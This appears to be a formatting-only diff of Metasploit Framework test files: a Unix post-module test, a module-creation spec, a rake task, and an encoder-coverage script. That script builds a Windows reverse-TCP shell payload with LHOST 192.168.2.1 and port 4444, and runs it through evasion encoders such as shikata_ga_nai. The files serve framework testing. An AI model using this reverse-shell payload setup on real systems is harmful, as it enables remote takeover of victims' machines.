lib = File.join(Msf::Config.install_root, "test", "lib")
|
||||||
$:.push(lib) unless $:.include?(lib)
|
$:.push(lib) unless $:.include?(lib)
|
||||||
require 'module_test'
|
require 'module_test'
|
||||||
|
|
||||||
#load 'test/lib/module_test.rb'
|
# load 'test/lib/module_test.rb'
|
||||||
#load 'lib/rex/text.rb'
|
# load 'lib/rex/text.rb'
|
||||||
#load 'lib/msf/core/post/linux/system.rb'
|
# load 'lib/msf/core/post/linux/system.rb'
|
||||||
#load 'lib/msf/core/post/unix/enum_user_dirs.rb'
|
# load 'lib/msf/core/post/unix/enum_user_dirs.rb'
|
||||||
|
|
||||||
class MetasploitModule < Msf::Post
|
class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
|
@ -15,15 +14,18 @@ class MetasploitModule < Msf::Post
|
||||||
include Msf::Post::Unix
|
include Msf::Post::Unix
|
||||||
include Msf::Post::Common
|
include Msf::Post::Common
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super( update_info( info,
|
super(
|
||||||
'Name' => 'Testing Remote Unix System Manipulation',
|
update_info(
|
||||||
'Description' => %q{ This module will test Post::File API methods },
|
info,
|
||||||
'License' => MSF_LICENSE,
|
'Name' => 'Testing Remote Unix System Manipulation',
|
||||||
'Author' => [ 'egypt'],
|
'Description' => %q{ This module will test Post::File API methods },
|
||||||
'Platform' => [ 'linux', 'java' ],
|
'License' => MSF_LICENSE,
|
||||||
'SessionTypes' => [ 'meterpreter', 'shell' ]
|
'Author' => [ 'egypt'],
|
||||||
))
|
'Platform' => [ 'linux', 'java' ],
|
||||||
|
'SessionTypes' => [ 'meterpreter', 'shell' ]
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_unix
|
def test_unix
|
||||||
|
@ -36,6 +38,7 @@ class MetasploitModule < Msf::Post
|
||||||
if ret
|
if ret
|
||||||
users.each { |u|
|
users.each { |u|
|
||||||
next unless u[:name] == "root"
|
next unless u[:name] == "root"
|
||||||
|
|
||||||
have_root = true
|
have_root = true
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
@ -44,8 +47,6 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
ret
|
ret
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -6,7 +6,7 @@ describe Msf::Simple::Framework do
|
||||||
klass = mod
|
klass = mod
|
||||||
it "should be able create #{ref}" do
|
it "should be able create #{ref}" do
|
||||||
e = $msf.modules.create(ref)
|
e = $msf.modules.create(ref)
|
||||||
e.should_not == nil
|
e.should_not == nil
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -1,7 +1,6 @@
|
||||||
require 'rubygems'
|
require 'rubygems'
|
||||||
require 'spec/rake/spectask'
|
require 'spec/rake/spectask'
|
||||||
Spec::Rake::SpecTask.new do |t|
|
Spec::Rake::SpecTask.new do |t|
|
||||||
t.ruby_opts = ['-rtest/unit']
|
t.ruby_opts = ['-rtest/unit']
|
||||||
t.spec_files = FileList['*_test.rb']
|
t.spec_files = FileList['*_test.rb']
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
#
|
#
|
||||||
# Simple script to test a group of encoders against every exploit in the framework,
|
# Simple script to test a group of encoders against every exploit in the framework,
|
||||||
# specifically for the exploits badchars, to see if a payload can be encoded. We ignore
|
# specifically for the exploits badchars, to see if a payload can be encoded. We ignore
|
||||||
# the target arch/platform of the exploit as we just want to pull out real world bad chars.
|
# the target arch/platform of the exploit as we just want to pull out real world bad chars.
|
||||||
#
|
#
|
||||||
|
@ -17,101 +17,92 @@ $msf = Msf::Simple::Framework.create
|
||||||
|
|
||||||
EXPLOITS = $msf.exploits
|
EXPLOITS = $msf.exploits
|
||||||
|
|
||||||
def print_line( message )
|
def print_line(message)
|
||||||
$stdout.puts( message )
|
$stdout.puts(message)
|
||||||
end
|
end
|
||||||
|
|
||||||
def format_badchars( badchars )
|
def format_badchars(badchars)
|
||||||
str = ''
|
str = ''
|
||||||
if( badchars )
|
if (badchars)
|
||||||
badchars.each_byte do | b |
|
badchars.each_byte do |b|
|
||||||
str << "\\x%02X" % [ b ]
|
str << "\\x%02X" % [ b ]
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
str
|
str
|
||||||
end
|
end
|
||||||
|
|
||||||
def encoder_v_payload( encoder_name, payload, verbose=false )
|
def encoder_v_payload(encoder_name, payload, verbose = false)
|
||||||
success = 0
|
success = 0
|
||||||
fail = 0
|
fail = 0
|
||||||
EXPLOITS.each_module do | name, mod |
|
EXPLOITS.each_module do |name, mod|
|
||||||
|
|
||||||
exploit = mod.new
|
exploit = mod.new
|
||||||
print_line( "\n#{encoder_name} v #{name} (#{ format_badchars( exploit.payload_badchars ) })" ) if verbose
|
print_line("\n#{encoder_name} v #{name} (#{format_badchars(exploit.payload_badchars)})") if verbose
|
||||||
begin
|
begin
|
||||||
encoder = $msf.encoders.create( encoder_name )
|
encoder = $msf.encoders.create(encoder_name)
|
||||||
raw = encoder.encode( payload, exploit.payload_badchars, nil, nil )
|
raw = encoder.encode(payload, exploit.payload_badchars, nil, nil)
|
||||||
success += 1
|
success += 1
|
||||||
rescue
|
rescue
|
||||||
print_line( " FAILED! badchars=#{ format_badchars( exploit.payload_badchars ) }\n" ) if verbose
|
print_line(" FAILED! badchars=#{format_badchars(exploit.payload_badchars)}\n") if verbose
|
||||||
fail += 1
|
fail += 1
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
return [ success, fail ]
|
return [ success, fail ]
|
||||||
end
|
end
|
||||||
|
|
||||||
def generate_payload( name )
|
def generate_payload(name)
|
||||||
|
payload = $msf.payloads.create(name)
|
||||||
|
|
||||||
payload = $msf.payloads.create( name )
|
|
||||||
|
|
||||||
# set options for a reverse_tcp payload
|
# set options for a reverse_tcp payload
|
||||||
payload.datastore['LHOST'] = '192.168.2.1'
|
payload.datastore['LHOST'] = '192.168.2.1'
|
||||||
payload.datastore['RHOST'] = '192.168.2.254'
|
payload.datastore['RHOST'] = '192.168.2.254'
|
||||||
payload.datastore['RPORT'] = '5432'
|
payload.datastore['RPORT'] = '5432'
|
||||||
payload.datastore['LPORT'] = '4444'
|
payload.datastore['LPORT'] = '4444'
|
||||||
# set options for an exec payload
|
# set options for an exec payload
|
||||||
payload.datastore['CMD'] = 'calc'
|
payload.datastore['CMD'] = 'calc'
|
||||||
# set generic options
|
# set generic options
|
||||||
payload.datastore['EXITFUNC'] = 'thread'
|
payload.datastore['EXITFUNC'] = 'thread'
|
||||||
|
|
||||||
return payload.generate
|
return payload.generate
|
||||||
end
|
end
|
||||||
|
|
||||||
def run( encoders, payload_name, verbose=false )
|
def run(encoders, payload_name, verbose = false)
|
||||||
|
payload = generate_payload(payload_name)
|
||||||
payload = generate_payload( payload_name )
|
|
||||||
|
|
||||||
table = Rex::Text::Table.new(
|
table = Rex::Text::Table.new(
|
||||||
'Header' => 'Encoder v Payload Test - ' + ::Time.new.strftime( "%d-%b-%Y %H:%M:%S" ),
|
'Header' => 'Encoder v Payload Test - ' + ::Time.new.strftime("%d-%b-%Y %H:%M:%S"),
|
||||||
'Indent' => 4,
|
'Indent' => 4,
|
||||||
'Columns' => [ 'Encoder Name', 'Success', 'Fail' ]
|
'Columns' => [ 'Encoder Name', 'Success', 'Fail' ]
|
||||||
)
|
)
|
||||||
|
|
||||||
encoders.each do | encoder_name |
|
encoders.each do |encoder_name|
|
||||||
|
success, fail = encoder_v_payload(encoder_name, payload, verbose)
|
||||||
success, fail = encoder_v_payload( encoder_name, payload, verbose )
|
|
||||||
|
|
||||||
table << [ encoder_name, success, fail ]
|
table << [ encoder_name, success, fail ]
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
return table
|
return table
|
||||||
end
|
end
|
||||||
|
|
||||||
if( $0 == __FILE__ )
|
if ($0 == __FILE__)
|
||||||
|
|
||||||
print_line( "[+] Starting.\n" )
|
print_line("[+] Starting.\n")
|
||||||
|
|
||||||
encoders = [
|
encoders = [
|
||||||
'x86/bloxor',
|
'x86/bloxor',
|
||||||
'x86/shikata_ga_nai',
|
'x86/shikata_ga_nai',
|
||||||
'x86/jmp_call_additive',
|
'x86/jmp_call_additive',
|
||||||
'x86/fnstenv_mov',
|
'x86/fnstenv_mov',
|
||||||
'x86/countdown',
|
'x86/countdown',
|
||||||
'x86/call4_dword_xor'
|
'x86/call4_dword_xor'
|
||||||
]
|
]
|
||||||
|
|
||||||
payload_name = 'windows/shell/reverse_tcp'
|
payload_name = 'windows/shell/reverse_tcp'
|
||||||
|
|
||||||
verbose = false
|
verbose = false
|
||||||
|
|
||||||
result_table = run( encoders, payload_name, verbose )
|
|
||||||
|
|
||||||
print_line( "\n\n#{result_table.to_s}\n\n" )
|
result_table = run(encoders, payload_name, verbose)
|
||||||
|
|
||||||
print_line( "[+] Finished.\n" )
|
print_line("\n\n#{result_table.to_s}\n\n")
|
||||||
|
|
||||||
|
print_line("[+] Finished.\n")
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|